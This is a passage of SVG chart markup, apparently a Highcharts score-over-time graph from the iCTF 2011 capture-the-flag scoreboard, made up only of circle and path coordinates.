stroke-width="0.000001" fill="#ff0066"></circle><circle cx="132.32828282828285" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="130.35264408793822" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="128.3770053475936" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="126.40136660724897" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="124.42572786690435" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="122.45008912655972" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="120.4744503862151" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="118.49881164587048" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="116.52317290552585" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="114.54753416518123" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="112.57189542483661" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="110.59625668449199" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="108.62061794414737" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="106.64497920380273" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="104.66934046345811" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="102.69370172311349" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="100.71806298276887" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="98.74242424242425" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="96.76678550207963" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="94.791146761735" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="92.81550802139039" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="90.83986928104575" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="88.86423054070113" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="86.88859180035651" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="84.91295306001189" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="82.93731431966727" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="80.96167557932264" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="78.98603683897802" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="77.0103980986334" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="75.03475935828877" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="73.05912061794415" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="71.08348187759952" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="69.1078431372549" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="67.13220439691028" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="65.15656565656566" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="63.18092691622104" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="61.20528817587642" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="59.2296494355318" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="57.254010695187176" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="55.27837195484255" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="53.30273321449793" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="51.327094474153306" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="49.351455733808685" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="47.375816993464056" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="45.400178253119435" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="43.424539512774814" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="41.44890077243019" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="39.473262032085564" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="37.49762329174094" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="35.52198455139632" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="33.5463458110517" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="31.570707070707076" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="29.59506833036245" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="27.61942959001783" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="25.643790849673206" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="23.668152109328584" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="21.69251336898396" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="19.71687462863934" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="17.741235888294714" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="15.765597147950093" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="13.78995840760547" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="11.814319667260847" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="9.838680926916224" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="7.863042186571599" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="5.887403446226976" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="3.9117647058823533" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle></g><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-185)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 252.16984510476246 L 120.4744503862151 252.16984510476246 L 122.45008912655972 252.16984510476246 L 124.42572786690435 252.16984510476246 L 126.40136660724897 252.16984510476246 L 128.3770053475936 252.16984510476246 L 130.35264408793822 252.16984510476246 L 132.32828282828285 252.16984510476246 L 134.3039215686275 252.16984510476246 L 136.2795603089721 252.16984510476246 L 138.25519904931673 252.16984510476246 L 140.23083778966134 252.16984510476246 L 142.20647653000597 252.16984510476246 L 144.18211527035058 252.16984510476246 L 146.15775401069521 252.16984510476246 L 148.13339275103985 252.16984510476246 L 150.10903149138446 252.16984510476246 L 152.0846702317291 252.16984510476246 L 154.0603089720737 252.16984510476246 L 156.03594771241833 252.16984510476246 L 158.01158645276294 252.16984510476246 L 159.98722519310758 252.16984510476246 L 161.96286393345218 252.16984510476246 L 163.93850267379682 252.16984510476246 L 165.91414141414145 252.16984510476246 L 167.88978015448606 252.16984510476246 L 169.8654188948307 252.16984510476246 L 171.8410576351753 252.16984510476246 L 173.81669637551994 252.16984510476246 L 175.79233511586455 252.16984510476246 L 177.76797385620918 252.16984510476246 L 179.74361259655382 252.16984510476246 L 181.71925133689842 252.16984510476246 L 183.69489007724306 252.16984510476246 L 185.67052881758767 252.16984510476246 L 187.6461675579323 252.16984510476246 L 189.6218062982769 252.16984510476246 L 191.59744503862154 252.16984510476246 L 193.57308377896615 252.16984510476246 L 195.5487225193108 252.16984510476246 L 197.52436125965542 252.16984510476246 L 199.50000000000003 252.16984510476246 L 201.47563874034466 252.16984510476246 L 203.45127748068927 252.16984510476246 L 205.4269162210339 252.16984510476246 L 207.4025549613785 252.16984510476246 L 209.37819370172315 252.16984510476246 L 211.35383244206778 252.16984510476246 L 213.3294711824124 252.16984510476246 L 215.30510992275703 252.16984510476246 L 217.28074866310163 238.12117767619102 L 219.25638740344627 227.70874339047674 L 221.23202614379088 214.29309310476248 L 223.2076648841355 207.177929676191 L 225.18330362448012 207.177929676191 L 227.15894236482475 207.177929676191 L 229.1345811051694 207.177929676191 L 231.110219845514 207.177929676191 L 233.08585858585863 207.177929676191 L 235.06149732620324 207.177929676191 L 237.03713606654787 207.177929676191 L 239.01277480689248 207.177929676191 L 240.98841354723712 207.177929676191 L 242.96405228758175 207.177929676191 L 244.93969102792636 207.177929676191 L 246.915329768271 207.177929676191 L 248.8909685086156 207.02913244952424 L 250.86660724896024 207.02913244952424 L 252.84224598930484 207.02913244952424 L 254.81788472964945 207.02913244952424 L 256.79352346999406 207.02913244952424 L 258.7691622103387 207.02913244952424 L 260.7448009506833 204.71985884952426 L 262.72043969102793 203.61855617523855 L 264.69607843137254 202.57059100952426 L 266.6717171717172 201.221426956191 L 268.6473559120618 201.221426956191 L 270.6229946524064 201.221426956191 L 272.598633392751 201.221426956191 L 274.5742721330957 201.221426956191 L 276.5499108734403 201.221426956191 L 278.5255496137849 201.221426956191 L 280.50118835412957 201.221426956191 L 282.4768270944742 201.221426956191 L 284.4524658348188 201.221426956191 L 286.4281045751634 201.221426956191 L 288.40374331550805 201.221426956191 L 290.37938205585266 201.221426956191 L 292.35502079619727 201.221426956191 L 294.33065953654193 201.221426956191 L 296.30629827688654 201.221426956191 L 298.28193701723114 201.221426956191 L 300.25757575757575 201.221426956191 L 302.2332144979204 201.221426956191 L 304.208853238265 201.221426956191 L 306.1844919786096 201.221426956191 L 308.1601307189543 201.221426956191 L 310.1357694592989 201.221426956191 L 312.1114081996435 201.221426956191 L 314.0870469399881 201.221426956191 L 316.0626856803328 201.221426956191 L 318.0383244206774 201.221426956191 L 320.013963161022 201.221426956191 L 321.98960190136665 201.221426956191 L 323.96524064171126 201.221426956191 L 325.94087938205587 201.221426956191 L 327.9165181224005 201.221426956191 L 329.89215686274514 201.221426956191 L 331.86779560308975 201.221426956191 L 333.84343434343435 201.221426956191 L 335.81907308377896 201.221426956191 L 337.7947118241236 201.221426956191 L 339.77035056446823 201.221426956191 L 341.74598930481284 201.221426956191 L 343.7216280451575 201.221426956191 L 345.6972667855021 201.221426956191 L 347.6729055258467 201.221426956191 L 349.6485442661913 201.221426956191 L 351.624183006536 201.221426956191 L 353.5998217468806 201.221426956191 L 355.5754604872252 201.221426956191 L 357.55109922756986 201.21215623619105 L 359.52673796791447 201.21215623619105 L 361.5023767082591 201.21215623619105 L 363.4780154486037 201.21215623619105 L 365.45365418894835 201.21215623619105 L 367.42929292929296 201.21215623619105 L 369.40493166963756 201.21215623619105 L 371.3805704099822 201.21215623619105 L 373.35620915032683 201.21215623619105 L 375.33184789067144 201.21215623619105 L 377.30748663101605 201.21215623619105 L 379.2831253713607 201.21215623619105 L 381.2587641117053 201.21215623619105 L 383.2344028520499 201.21215623619105 L 385.2100415923946 201.21215623619105 L 387.1856803327392 201.21215623619105 L 389.1613190730838 201.21215623619105 L 391.1369578134284 201.21215623619105 L 393.1125965537731 201.17433589333388 L 395.0882352941177 201.17433589333388" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 252.16984510476246 L 120.4744503862151 252.16984510476246 L 122.45008912655972 252.16984510476246 L 124.42572786690435 252.16984510476246 L 126.40136660724897 252.16984510476246 L 128.3770053475936 252.16984510476246 L 130.35264408793822 252.16984510476246 L 132.32828282828285 252.16984510476246 L 134.3039215686275 252.16984510476246 L 136.2795603089721 252.16984510476246 L 138.25519904931673 252.16984510476246 L 140.23083778966134 252.16984510476246 L 142.20647653000597 252.16984510476246 L 144.18211527035058 252.16984510476246 L 146.15775401069521 252.16984510476246 L 148.13339275103985 252.16984510476246 L 150.10903149138446 252.16984510476246 L 152.0846702317291 252.16984510476246 L 154.0603089720737 252.16984510476246 L 156.03594771241833 252.16984510476246 L 158.01158645276294 252.16984510476246 L 159.98722519310758 252.16984510476246 L 161.96286393345218 252.16984510476246 L 163.93850267379682 252.16984510476246 L 165.91414141414145 252.16984510476246 L 167.88978015448606 252.16984510476246 L 169.8654188948307 252.16984510476246 L 171.8410576351753 252.16984510476246 L 173.81669637551994 252.16984510476246 L 175.79233511586455 252.16984510476246 L 177.76797385620918 252.16984510476246 L 179.74361259655382 252.16984510476246 L 181.71925133689842 252.16984510476246 L 183.69489007724306 252.16984510476246 L 185.67052881758767 252.16984510476246 L 187.6461675579323 252.16984510476246 L 189.6218062982769 252.16984510476246 L 191.59744503862154 252.16984510476246 L 193.57308377896615 252.16984510476246 L 195.5487225193108 252.16984510476246 L 197.52436125965542 252.16984510476246 L 199.50000000000003 252.16984510476246 L 201.47563874034466 252.16984510476246 L 203.45127748068927 252.16984510476246 L 205.4269162210339 252.16984510476246 L 207.4025549613785 252.16984510476246 L 209.37819370172315 252.16984510476246 L 211.35383244206778 252.16984510476246 L 213.3294711824124 252.16984510476246 L 215.30510992275703 252.16984510476246 L 217.28074866310163 238.12117767619102 L 219.25638740344627 227.70874339047674 L 221.23202614379088 214.29309310476248 L 223.2076648841355 207.177929676191 L 225.18330362448012 207.177929676191 L 227.15894236482475 207.177929676191 L 229.1345811051694 207.177929676191 L 231.110219845514 207.177929676191 L 233.08585858585863 207.177929676191 L 235.06149732620324 207.177929676191 L 237.03713606654787 207.177929676191 L 239.01277480689248 207.177929676191 L 240.98841354723712 207.177929676191 L 242.96405228758175 207.177929676191 L 244.93969102792636 207.177929676191 L 246.915329768271 207.177929676191 L 248.8909685086156 207.02913244952424 L 250.86660724896024 207.02913244952424 L 252.84224598930484 207.02913244952424 L 254.81788472964945 207.02913244952424 L 256.79352346999406 207.02913244952424 L 258.7691622103387 207.02913244952424 L 260.7448009506833 204.71985884952426 L 262.72043969102793 203.61855617523855 L 264.69607843137254 202.57059100952426 L 266.6717171717172 201.221426956191 L 268.6473559120618 201.221426956191 L 270.6229946524064 201.221426956191 L 272.598633392751 201.221426956191 L 274.5742721330957 201.221426956191 L 276.5499108734403 201.221426956191 L 278.5255496137849 201.221426956191 L 280.50118835412957 201.221426956191 L 282.4768270944742 201.221426956191 L 284.4524658348188 201.221426956191 L 286.4281045751634 201.221426956191 L 288.40374331550805 201.221426956191 L 290.37938205585266 201.221426956191 L 292.35502079619727 201.221426956191 L 294.33065953654193 201.221426956191 L 296.30629827688654 201.221426956191 L 298.28193701723114 201.221426956191 L 300.25757575757575 201.221426956191 L 302.2332144979204 201.221426956191 L 304.208853238265 201.221426956191 L 306.1844919786096 201.221426956191 L 308.1601307189543 201.221426956191 L 310.1357694592989 201.221426956191 L 312.1114081996435 201.221426956191 L 314.0870469399881 201.221426956191 L 316.0626856803328 201.221426956191 L 318.0383244206774 201.221426956191 L 320.013963161022 201.221426956191 L 321.98960190136665 201.221426956191 L 323.96524064171126 201.221426956191 L 325.94087938205587 201.221426956191 L 327.9165181224005 201.221426956191 L 329.89215686274514 201.221426956191 L 331.86779560308975 201.221426956191 L 333.84343434343435 201.221426956191 L 335.81907308377896 201.221426956191 L 337.7947118241236 201.221426956191 L 339.77035056446823 201.221426956191 L 341.74598930481284 201.221426956191 L 343.7216280451575 201.221426956191 L 345.6972667855021 201.221426956191 L 347.6729055258467 201.221426956191 L 349.6485442661913 201.221426956191 L 351.624183006536 201.221426956191 L 353.5998217468806 201.221426956191 L 355.5754604872252 201.221426956191 L 357.55109922756986 201.21215623619105 L 359.52673796791447 201.21215623619105 L 361.5023767082591 201.21215623619105 L 363.4780154486037 201.21215623619105 L 365.45365418894835 201.21215623619105 L 367.42929292929296 201.21215623619105 L 369.40493166963756 201.21215623619105 L 371.3805704099822 201.21215623619105 L 373.35620915032683 201.21215623619105 L 375.33184789067144 201.21215623619105 L 377.30748663101605 201.21215623619105 L 379.2831253713607 201.21215623619105 L 381.2587641117053 201.21215623619105 L 383.2344028520499 201.21215623619105 L 385.2100415923946 201.21215623619105 L 387.1856803327392 201.21215623619105 L 389.1613190730838 201.21215623619105 L 391.1369578134284 201.21215623619105 L 393.1125965537731 201.17433589333388 L 395.0882352941177 201.17433589333388" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 252.16984510476246 L 120.4744503862151 252.16984510476246 L 122.45008912655972 252.16984510476246 L 124.42572786690435 252.16984510476246 L 126.40136660724897 252.16984510476246 L 128.3770053475936 252.16984510476246 L 130.35264408793822 252.16984510476246 L 132.32828282828285 252.16984510476246 L 134.3039215686275 252.16984510476246 L 136.2795603089721 252.16984510476246 L 138.25519904931673 252.16984510476246 L 140.23083778966134 252.16984510476246 L 142.20647653000597 252.16984510476246 L 144.18211527035058 252.16984510476246 L 146.15775401069521 252.16984510476246 L 148.13339275103985 252.16984510476246 L 150.10903149138446 252.16984510476246 L 152.0846702317291 252.16984510476246 L 154.0603089720737 252.16984510476246 L 156.03594771241833 252.16984510476246 L 158.01158645276294 252.16984510476246 L 159.98722519310758 252.16984510476246 L 161.96286393345218 252.16984510476246 L 163.93850267379682 252.16984510476246 L 165.91414141414145 252.16984510476246 L 167.88978015448606 252.16984510476246 L 169.8654188948307 252.16984510476246 L 171.8410576351753 252.16984510476246 L 173.81669637551994 252.16984510476246 L 175.79233511586455 252.16984510476246 L 177.76797385620918 252.16984510476246 L 179.74361259655382 252.16984510476246 L 181.71925133689842 252.16984510476246 L 183.69489007724306 252.16984510476246 L 185.67052881758767 252.16984510476246 L 187.6461675579323 252.16984510476246 L 189.6218062982769 252.16984510476246 L 191.59744503862154 252.16984510476246 L 193.57308377896615 252.16984510476246 L 195.5487225193108 252.16984510476246 L 197.52436125965542 252.16984510476246 L 199.50000000000003 252.16984510476246 L 201.47563874034466 252.16984510476246 L 203.45127748068927 252.16984510476246 L 205.4269162210339 252.16984510476246 L 207.4025549613785 252.16984510476246 L 209.37819370172315 252.16984510476246 L 211.35383244206778 252.16984510476246 L 213.3294711824124 252.16984510476246 L 215.30510992275703 252.16984510476246 L 217.28074866310163 238.12117767619102 L 219.25638740344627 227.70874339047674 L 221.23202614379088 214.29309310476248 L 223.2076648841355 207.177929676191 L 225.18330362448012 207.177929676191 L 227.15894236482475 207.177929676191 L 229.1345811051694 207.177929676191 L 231.110219845514 207.177929676191 L 233.08585858585863 207.177929676191 L 235.06149732620324 207.177929676191 L 237.03713606654787 207.177929676191 L 239.01277480689248 207.177929676191 L 240.98841354723712 207.177929676191 L 242.96405228758175 207.177929676191 L 244.93969102792636 207.177929676191 L 246.915329768271 207.177929676191 L 248.8909685086156 207.02913244952424 L 250.86660724896024 207.02913244952424 L 252.84224598930484 207.02913244952424 L 254.81788472964945 207.02913244952424 L 256.79352346999406 207.02913244952424 L 258.7691622103387 207.02913244952424 L 260.7448009506833 204.71985884952426 L 262.72043969102793 203.61855617523855 L 264.69607843137254 202.57059100952426 L 266.6717171717172 201.221426956191 L 268.6473559120618 201.221426956191 L 270.6229946524064 201.221426956191 L 272.598633392751 201.221426956191 L 274.5742721330957 201.221426956191 L 276.5499108734403 201.221426956191 L 278.5255496137849 201.221426956191 L 280.50118835412957 201.221426956191 L 282.4768270944742 201.221426956191 L 284.4524658348188 201.221426956191 L 286.4281045751634 201.221426956191 L 288.40374331550805 201.221426956191 L 290.37938205585266 201.221426956191 L 292.35502079619727 201.221426956191 L 294.33065953654193 201.221426956191 L 296.30629827688654 201.221426956191 L 298.28193701723114 201.221426956191 L 300.25757575757575 201.221426956191 L 302.2332144979204 201.221426956191 L 304.208853238265 201.221426956191 L 306.1844919786096 201.221426956191 L 308.1601307189543 201.221426956191 L 310.1357694592989 201.221426956191 L 312.1114081996435 201.221426956191 L 314.0870469399881 201.221426956191 L 316.0626856803328 201.221426956191 L 318.0383244206774 201.221426956191 L 320.013963161022 201.221426956191 L 321.98960190136665 201.221426956191 L 323.96524064171126 201.221426956191 L 325.94087938205587 201.221426956191 L 327.9165181224005 201.221426956191 L 329.89215686274514 201.221426956191 L 331.86779560308975 201.221426956191 L 333.84343434343435 201.221426956191 L 335.81907308377896 201.221426956191 L 337.7947118241236 201.221426956191 L 339.77035056446823 201.221426956191 L 341.74598930481284 201.221426956191 L 343.7216280451575 201.221426956191 L 345.6972667855021 201.221426956191 L 347.6729055258467 201.221426956191 L 349.6485442661913 201.221426956191 L 351.624183006536 201.221426956191 L 353.5998217468806 201.221426956191 L 355.5754604872252 201.221426956191 L 357.55109922756986 201.21215623619105 L 359.52673796791447 201.21215623619105 L 361.5023767082591 201.21215623619105 L 363.4780154486037 201.21215623619105 L 365.45365418894835 201.21215623619105 L 367.42929292929296 201.21215623619105 L 369.40493166963756 201.21215623619105 L 371.3805704099822 201.21215623619105 L 373.35620915032683 201.21215623619105 L 375.33184789067144 201.21215623619105 L 377.30748663101605 201.21215623619105 L 379.2831253713607 201.21215623619105 L 381.2587641117053 201.21215623619105 L 383.2344028520499 201.21215623619105 L 385.2100415923946 201.21215623619105 L 387.1856803327392 201.21215623619105 L 389.1613190730838 201.21215623619105 L 391.1369578134284 201.21215623619105 L 393.1125965537731 201.17433589333388 L 395.0882352941177 201.17433589333388" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 